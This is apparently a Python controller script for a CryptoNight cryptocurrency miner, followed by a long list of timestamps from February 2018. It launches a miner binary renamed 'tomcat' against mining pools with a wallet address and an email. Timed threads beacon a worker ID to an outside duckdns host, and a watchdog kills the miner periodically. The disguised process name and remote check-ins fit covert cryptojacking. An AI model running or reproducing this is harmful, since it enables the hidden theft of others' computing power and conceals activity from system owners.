import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:07.179073
#2018-02-17 16:04:06.084170
#2018-02-17 17:53:03.942310
#2018-02-17 19:39:07.300632
#2018-02-17 21:28:07.885633
#2018-02-17 23:12:07.141677
#2018-02-18 00:59:07.637670
#2018-02-18 02:47:07.284768
#2018-02-18 04:36:05.307948
#2018-02-18 06:27:06.538127
#2018-02-18 08:16:06.744972
#2018-02-18 10:04:01.475086
#2018-02-18 11:50:08.923300
#2018-02-18 13:35:06.313838
#2018-02-18 15:25:06.769169
#2018-02-18 17:15:06.909668
#2018-02-18 19:03:05.466349
#2018-02-18 20:49:07.375099
#2018-02-18 22:36:05.976320
#2018-02-19 00:24:03.209101
#2018-02-19 02:10:06.352080
#2018-02-19 03:57:03.533539
#2018-02-19 05:42:04.622351
#2018-02-19 07:30:08.479103
#2018-02-19 09:20:01.380089
#2018-02-19 11:09:07.861648
#2018-02-19 12:56:04.531733
#2018-02-19 14:45:08.145532
#2018-02-19 16:33:07.929545
#2018-02-19 18:19:02.234953
#2018-02-19 20:04:08.485613
#2018-02-19 21:53:07.582528
#2018-02-19 23:39:01.248769
#2018-02-20 01:26:06.238371
#2018-02-20 03:15:09.336094
#2018-02-20 05:03:07.398553
#2018-02-20 06:45:05.425571
#2018-02-20 08:32:01.727588
#2018-02-20 10:16:01.467576
#2018-02-20 12:01:01.331819
#2018-02-20 13:49:06.089501
#2018-02-20 15:33:06.420876
#2018-02-20 18:28:08.232261
#2018-02-20 20:19:07.210623
#2018-02-20 22:04:05.837283
#2018-02-20 23:46:06.836925
#2018-02-21 01:32:07.319221
#2018-02-21 03:19:02.190388
#2018-02-21 05:07:06.308419
#2018-02-21 06:54:07.131893
#2018-02-21 08:42:08.673870
#2018-02-21 10:29:01.709889
#2018-02-21 12:16:08.726050
#2018-02-21 14:05:01.639872
#2018-02-21 15:51:06.581434
#2018-02-21 17:43:02.125284
#2018-02-21 19:28:04.636828
#2018-02-21 21:18:01.320825
#2018-02-21 23:04:03.667045
#2018-02-22 00:52:02.205222
#2018-02-22 02:39:03.966695
#2018-02-22 04:26:01.899304
#2018-02-22 06:11:06.395398
#2018-02-22 07:55:08.958273
#2018-02-22 09:44:08.937663
#2018-02-22 11:30:01.425773
#2018-02-22 13:16:08.587629
#2018-02-22 15:05:01.741100
#2018-02-22 16:50:15.190990
#2018-02-22 18:38:07.670207
#2018-02-22 20:29:08.592658
#2018-02-22 22:14:08.152366
#2018-02-23 00:02:06.485642
#2018-02-23 01:51:05.681252
#2018-02-23 03:40:08.006542
#2018-02-23 05:25:04.071358
#2018-02-23 07:10:08.941283
#2018-02-23 09:17:01.283530
#2018-02-23 11:22:06.201348
#2018-02-23 13:12:07.650862
#2018-02-23 14:57:07.892316
#2018-02-23 16:47:05.729088
#2018-02-23 18:59:03.980895
#2018-02-23 20:46:06.263173
#2018-02-23 22:34:07.040247
#2018-02-24 00:20:11.117158
#2018-02-24 02:13:01.698090
#2018-02-24 04:02:06.574277
#2018-02-24 05:47:07.883885
#2018-02-24 07:33:05.176299
#2018-02-24 09:19:07.209589
#2018-02-24 11:08:05.473439
#2018-02-24 12:56:06.267053
#2018-02-24 14:44:03.839726
#2018-02-24 16:36:04.651544
#2018-02-24 18:25:01.950566
#2018-02-24 20:11:01.785793
#2018-02-24 21:55:05.667978
#2018-02-25 00:56:03.991065
#2018-02-25 03:54:06.170226
#2018-02-25 06:38:06.237011
#2018-02-25 11:36:08.512137
#2018-02-25 13:43:01.253879
#2018-02-25 15:17:01.608450